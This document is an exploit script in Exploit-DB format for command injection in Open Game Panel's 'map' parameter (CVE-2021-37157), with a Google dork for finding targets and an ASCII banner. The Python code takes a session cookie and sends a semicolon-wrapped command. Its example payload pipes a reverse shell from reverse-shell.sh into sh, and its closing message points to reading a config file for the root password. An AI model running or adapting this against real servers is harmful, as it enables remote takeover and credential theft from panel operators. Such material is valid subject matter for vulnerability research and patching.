# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102
#Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command=
betwen ';', the user needs to be authenticated for this.
import requests
banner = """
@
@ @@& @@@@@/
@ @& #@@@@@& .=
,/%@#
@ @@@@@@@@@@@@@((%@@@@*
@ #@@@@@@@@@@@@@@@*%@,
@ @@@@@@@@@@@@@@&@@@@
@ &@@@@@@@@@/ &@@@.
@ @@@@@@@@@(
@ @@@@@@@@@@@@@&*
@ &@@@@@@@@@@@@@@@@%
@ ,&@@@@@@@@@@@@@
@ %@@@@@@@.
@ .%@@@@@@@@% @@@@@@
@ @@@@@# .&@@@@#
@ (@@@@@@@@@@@. .@@@& @@%
@ .@@@@@, #@@@@@* #@@@ @@@@@
@ @@@& &@@@. @@@
@ ,@@@ @@@@@@
@ @@@ %@@@,
@&@@ @@@,
@@@@
@@@@
*@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@=
%
*@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@=
%
*@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@=
%
*@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@=
%
*@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@=
@@@@
##You can get mod_id and home_id on your game panel URL when you are logged
"""
print(banner)
target = input("Target url: (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")
url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
try:
requests.post(url, headers=headers, cookies=cookies, data=data)
except:
print("Something went wrong, check your inputs or try manually exploiting the map parameter")
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")